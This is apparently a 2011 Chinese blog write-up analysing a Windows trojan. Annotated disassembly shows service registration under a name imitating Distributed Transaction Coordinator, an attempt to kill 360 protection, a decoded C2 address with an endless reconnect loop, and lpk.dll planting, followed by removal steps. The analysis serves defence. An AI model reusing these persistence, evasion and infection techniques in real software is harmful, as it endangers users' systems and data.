.text:00402A6E ; 21: ServiceStartTable.lpServiceName = "Distribuvbf";
.text:00402A6E lea ecx, [ebp+ServiceStartTable]
.text:00402A71 mov [ebp+ServiceStartTable.lpServiceName], offset ServiceName ; "Distribuvbf"
.text:00402A78 ; 22: ServiceStartTable.lpServiceProc = (LPSERVICE_MAIN_FUNCTIONA)sub_402730; -- service main; its tail is shown further below
.text:00402A78 push ecx ; lpServiceStartTable
.text:00402A79 mov [ebp+ServiceStartTable.lpServiceProc], offset sub_402730
.text:00402A80 ; 23: v5 = 0; -- NULL/NULL terminator entry of the SERVICE_TABLE_ENTRY array
.text:00402A80 mov [ebp+var_8], 0
.text:00402A87 ; 24: v6 = 0;
.text:00402A87 mov [ebp+var_4], 0
.text:00402A8E ; 25: StartServiceCtrlDispatcherA(&ServiceStartTable);
.text:00402A8E call StartServiceCtrlDispatcherA ; service already registered -> connect to the SCM and run sub_402730 as the service main
.text:00402A94 ; 39: return 1;
.text:00402A94
.text:00402A94 loc_402A94: ; CODE XREF: OnInit+DBj
.text:00402A94 mov eax, 1
.text:00402A99 mov esp, ebp
.text:00402A9B pop ebp
.text:00402A9C retn
.text:00402A9D ; ---------------------------------------------------------------------------
.text:00402A9D ; 29: sub_402B40(
.text:00402A9D ; 30: "Distribuvbf",
.text:00402A9D ; 31: "Distribuihd Transaction Coordinator Service", -- display name mimicking the legitimate "Distributed Transaction Coordinator"
.text:00402A9D ; 32: "Distribucha Transaction Coordinator Service."); -- description, same mimicry
.text:00402A9D
.text:00402A9D loc_402A9D: ; CODE XREF: OnInit+8Cj
.text:00402A9D push offset Data ; "Distribucha Transaction Coordinator Ser"...
.text:00402AA2 push offset DisplayName ; "Distribuihd Transaction Coordinator Ser"...
.text:00402AA7 push offset ServiceName ; "Distribuvbf"
.text:00402AAC call RegServiceAndStart ; analyst's name for sub_402B40 (CreateService/StartService wrapper, body not shown)
.text:00402AB1 ; 33: if ( dword_409388 )
.text:00402AB1 mov eax, dword_409388 ; flag set somewhere inside RegServiceAndStart (not shown); the analyst reads non-zero as "registration failed -> bail out"
.text:00402AB6 add esp, 0Ch
.text:00402AB9 test eax, eax
.text:00402ABB jz short loc_402A94 ; flag clear -> return 1
.text:00402ABD ; 35: sub_402330();
.text:00402ABD call MoveFile ; analyst-named wrapper; observed at runtime: 0012F65C 0012F784 |NewName = "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\SOFTWARE.LOG"
.text:00402AC2 ; 36: ExitProcess(0);
.text:00402AC2 push 0 ; uExitCode
.text:00402AC4 call ds:ExitProcess
.text:00402AC4 OnInit endp
以上是进程 Init 的处理：隐藏窗口、尝试 taskkill 掉 360 主动防御、然后按注册表里有没有服务项决定是直接以服务 Distribuvbf 运行还是先注册再启动。
肮脏的解密（服务主函数 sub_402730 中从 loc_4027E6 开始的一段，函数前半部分没有贴出）：
.text:004027E6 ; 20: lpkInfect();
.text:004027E6
.text:004027E6 ; Fragment of sub_402730 (the service main registered in OnInit), from loc_4027E6 onward.
.text:004027E6 ; Neither the start of the function nor anything after the reconnect loop is in the paste.
.text:004027E6 loc_4027E6: ; CODE XREF: sub_402730+A9j
.text:004027E6 call lpkInfect ; analyst-named; body not shown
.text:004027EB ; 21: wsprintfA(&v0, "hra%u.dll", 33); -> "hra33.dll"
.text:004027EB push 21h ; 33
.text:004027ED lea ecx, [esp+14h]
.text:004027F1 push offset aHraU_dll ; "hra%u.dll"
.text:004027F6 push ecx ; LPSTR
.text:004027F7 call wsprintfA
.text:004027FD ; 22: sub_402520(&v0); -- receives the "hra33.dll" name; what it does with it is not shown
.text:004027FD lea edx, [esp+1Ch]
.text:00402801 push edx ; pFileName
.text:00402802 call sub_402520
.text:00402807 ; 23: LoadVirusLpk();
.text:00402807 call LoadVirusLpk ; analyst-named; body not shown
.text:0040280C ; 24: decode((int)"s僼婸3344P弔?>6>6", strlen("s僼婸3344P弔?>6>6") - 1, 18); -- in-place decode of the C2 string, key 0x12
.text:0040280C mov edi, offset aSgtlp3344pptz66 ; ASCII "scrk.3322.org:8080" -- the value after decode
.text:0040280C ; decoded string
.text:00402811 or ecx, 0FFFFFFFFh ; inline strlen idiom: or/xor/repne scasb/not/dec
.text:00402814 xor eax, eax
.text:00402816 push 12h ; key = 0x12
.text:00402818 repne scasb
.text:0040281A not ecx
.text:0040281C dec ecx
.text:0040281D push ecx ; length from the inline strlen above
.text:0040281E push offset aSgtlp3344pptz66 ; "s僼婸3344P弔?>6>6" -- encoded form
.text:00402823 call decode
.text:00402828 ; 25: WSAStartup(0x202u, (struct WSAData *)((char *)&WSAData + 16)); -- Winsock 2.2
.text:00402828 add esp, 1Ch ; cdecl cleanup for the three calls above (4 + 0Ch + 0Ch)
.text:0040282B lea eax, [esp+294h+WSAData.szDescription+0Ch]
.text:00402832 push eax ; lpWSAData
.text:00402833 push 202h ; wVersionRequested
.text:00402838 call WSAStartup
.text:0040283E mov edi, ds:WaitForSingleObject
.text:00402844 mov ebx, ds:CloseHandle
.text:0040284A mov ebp, closesocket
.text:00402850 ; 28: hObject = CreateThraed((LPTHREAD_START_ROUTINE)bAdApple, 0); -- bAdApple is the analyst's name for the C2 callback (presumably the routine at 004019C0 shown below)
.text:00402850
.text:00402850 loc_402850: ; CODE XREF: sub_402730+159j
.text:00402850 push 0 ; lpParameter
.text:00402852 push offset bAdApple ; lpStartAddress
.text:00402857 call CreateThraed ; [sic] analyst-named wrapper
.text:0040285C ; 29: WaitForSingleObject(hObject, 0xFFFFFFFFu); -- block until the C2 thread dies
.text:0040285C push 0FFFFFFFFh ; dwMilliseconds = INFINITE
.text:0040285E ; 26: while ( 1 )
.text:0040285E push eax ; hHandle
.text:0040285F mov hObject, eax
.text:00402864 call edi ; WaitForSingleObject
.text:00402866 ; 30: CloseHandle(hObject);
.text:00402866 mov ecx, hObject
.text:0040286C push ecx ; hObject
.text:0040286D call ebx ; CloseHandle
.text:0040286F ; 31: closesocket(s); -- global socket owned by the C2 thread
.text:0040286F mov edx, s
.text:00402875 push edx ; s
.text:00402876 call ebp ; closesocket
.text:00402878 ; 33: Sleep(0x12Cu); -- 300 ms, then respawn the thread: an unbounded reconnect loop
.text:00402878 push 12Ch ; dwMilliseconds
.text:0040287D ; 32: dword_408634 = 1;
.text:0040287D mov dword_408634, 1 ; global flag, meaning not visible here
.text:00402887 call esi ; Sleep
.text:00402889 jmp short loc_402850
得到这么个好东西：C2 地址 scrk.3322.org:8080（用 0x12 作 key 解出来的。处置时把这个域名和端口加入封堵与告警）。
然后就是 CreateThread 起线程干坏事。注意这是个死循环：线程一退出就 CloseHandle、closesocket，置 dword_408634 = 1，Sleep 300ms 后再起一个线程——相当于无限重连。
坏事回调函数（bAdApple，位于 004019C0，光局部变量就开了 0x9C4 字节的栈）：
004019C0 . 81EC C4090000 sub esp, 9C4
此部分比较长了、而且不大会分析、各位有兴趣可以去看我上传的idb
然后是一系列获取计算机基本信息，发送到上面解密出来的地址……再装载肮脏的 Lpk 进行感染……
至此全病毒感染模块分析完毕……因为本人是网络白痴、就算见到了网络操作代码也不知道到底是干什么的
……囧虚……
此病毒就是启动一个服务、坏事都在服务里做,因为本人也没搞过服务程序开发、所以也不知道这块怎么分
析、不过零散的分析大概已经把服务要做的事情都分析出来了……
删除病毒时的处置顺序（按上面分析到的行为整理）：
1. 先停止、再删除病毒服务：服务名 Distribuvbf，显示名伪装成 "Distribuihd Transaction Coordinator Service"（仿冒系统的 Distributed Transaction Coordinator），可以用 XueTr 处理。服务对应的核心 exe 直接看该服务注册表项（HKLM\SYSTEM\CurrentControlSet\Services\Distribuvbf）里的 ImagePath，比"到 System32 下找最近修改的 exe"可靠得多——后者只是猜测，容易误删。
2. 清理被投放的 lpk.dll：每个含 exe 的目录都会被放一个（属性 只读+隐藏+系统，查找时记得显示隐藏/系统文件；System32 下那个要和正常的系统 lpk.dll 比对哈希再决定），50MB 以下且含 exe 的 rar/zip 压缩包里也会被塞进一个 lpk.dll（可用 rar vb 列出压缩包内容确认），所以只删 System32 下的文件并不够。手工处理很不方便，建议用工具递归清理，当然也可以自己写个脚本。
3. 同时留意 hra33.dll、%TEMP%\SOFTWARE.LOG，以及对 scrk.3322.org:8080 的外连，并把该域名加入封堵/告警。
- -讨厌这种用技术干坏事的、鄙视下病毒作者、还真是无聊啊……这种猫和老鼠的游戏大概永远都不会结
束吧……
其实说句实话今天分析这个病毒是因为中午帮同学修电脑修坏了……、发泄下、……真是Bug啊……又把别
人的Bootmgr压缩了……- -刚才已经解决完毕了……所以我也没有必要继续寂寞下去了……娱乐去了、各位
晚安。
游戏CG x1附赠
Azure[LCG]
2011.02.06
样本.rar
idb.rar